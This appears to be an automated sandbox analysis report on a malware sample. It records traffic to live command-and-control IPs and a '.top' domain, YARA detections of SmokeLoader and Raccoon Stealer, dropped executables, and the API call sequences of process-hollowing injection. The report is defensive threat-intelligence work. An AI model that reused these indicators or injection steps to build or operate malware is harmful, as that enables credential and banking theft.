92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agvlhndt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.6:49815 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 15.1.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.8908.exe.2b615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.y8WngeDn4q.exe.47615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.1.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.4EDC.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.esdfufc.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.412091703.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482521678.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.394109827.0000000002801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.530637179.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.529516403.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.411806433.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.511213614.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482408758.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.559098642.00000000049E1000.00000004.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 6E1E.exe, 0000001B.00000002.558082279.0000000002DDA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR

System Summary:

barindex
.NET source code contains very large array initializations
Source: 3FD8.exe.6.dr, ???????????????.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Source: D083.exe.6.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022430 22_2_6C022430
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C000D20 22_2_6C000D20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022D50 22_2_6C022D50
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D1D55 22_2_6C0D1D55
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0335D0 22_2_6C0335D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C026E30 22_2_6C026E30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D2EF7 22_2_6C0D2EF7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C67E2 22_2_6C0C67E2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE7FF 22_2_6C0BE7FF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1002 22_2_6C0C1002
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C038840 22_2_6C038840
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B090 22_2_6C01B090
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022990 22_2_6C022990
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFA2B 22_2_6C0BFA2B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D32A9 22_2_6C0D32A9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CE2C5 22_2_6C0CE2C5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02AB40 22_2_6C02AB40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C023360 22_2_6C023360
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03EBB0 22_2_6C03EBB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03ABD8 22_2_6C03ABD8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C058BE8 22_2_6C058BE8
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004368D0 27_2_004368D0
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_0041EDCE 27_2_0041EDCE
PE file contains strange resources
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E11F.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E11F.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.19.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.19.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Uses 32bit PE files
Source: y8WngeDn4q.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 24.0.60DF.exe.440000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.60DF.exe.440000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.60DF.exe.440000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.2.D083.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.60DF.exe.440000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\60DF.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\D083.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\FC0C.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\37D8.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: String function: 0041D100 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: String function: 004212E0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: String function: 6C095720 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: String function: 6C00B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: String function: 6C05D08C appears 41 times
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_04760110
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040185B Sleep,NtTerminateProcess, 3_2_0040185B
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_00401866 Sleep,NtTerminateProcess, 3_2_00401866
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040187A Sleep,NtTerminateProcess, 3_2_0040187A
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040163B NtMapViewOfSection, 3_2_0040163B
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_004018D3 NtTerminateProcess, 3_2_004018D3
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_00401884 Sleep,NtTerminateProcess, 3_2_00401884
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_00401888 NtTerminateProcess, 3_2_00401888
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040156A NtMapViewOfSection, 3_2_0040156A
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_2_004015DB
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_004017EA Sleep,NtTerminateProcess, 3_2_004017EA
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_1_0040156A NtMapViewOfSection, 3_1_0040156A
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_1_004015DB
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_1_0040163B NtMapViewOfSection, 3_1_0040163B
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_02CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 12_2_02CB0110
Source: C:\Users\user\AppData\Local\Temp\8908.exe Code function: 13_2_02B60110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 13_2_02B60110
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040185B Sleep,NtTerminateProcess, 14_2_0040185B
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_00401866 Sleep,NtTerminateProcess, 14_2_00401866
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040187A Sleep,NtTerminateProcess, 14_2_0040187A
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040163B NtMapViewOfSection, 14_2_0040163B
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_004018D3 NtTerminateProcess, 14_2_004018D3
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_00401884 Sleep,NtTerminateProcess, 14_2_00401884
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_00401888 NtTerminateProcess, 14_2_00401888
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040156A NtMapViewOfSection, 14_2_0040156A
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 14_2_004015DB
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_004017EA Sleep,NtTerminateProcess, 14_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_0040181C Sleep,NtTerminateProcess, 22_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402406 NtEnumerateKey, 22_2_00402406
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00401F25 NtQuerySystemInformation, 22_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00401828 Sleep,NtTerminateProcess, 22_2_00401828
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402431 NtEnumerateKey, 22_2_00402431
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_004017DA Sleep,NtTerminateProcess, 22_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_004017F8 NtTerminateProcess, 22_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_0040209A NtQuerySystemInformation, 22_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_004017A3 Sleep,NtTerminateProcess, 22_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049600 ZwOpenKey,LdrInitializeThunk, 22_2_6C049600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049660 ZwAllocateVirtualMemory,LdrInitializeThunk, 22_2_6C049660
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04967A NtQueryInformationProcess,LdrInitializeThunk, 22_2_6C04967A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049780 ZwMapViewOfSection,LdrInitializeThunk, 22_2_6C049780
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049820 ZwEnumerateKey,LdrInitializeThunk, 22_2_6C049820
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049860 ZwQuerySystemInformation,LdrInitializeThunk, 22_2_6C049860
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0498C0 ZwDuplicateObject,LdrInitializeThunk, 22_2_6C0498C0
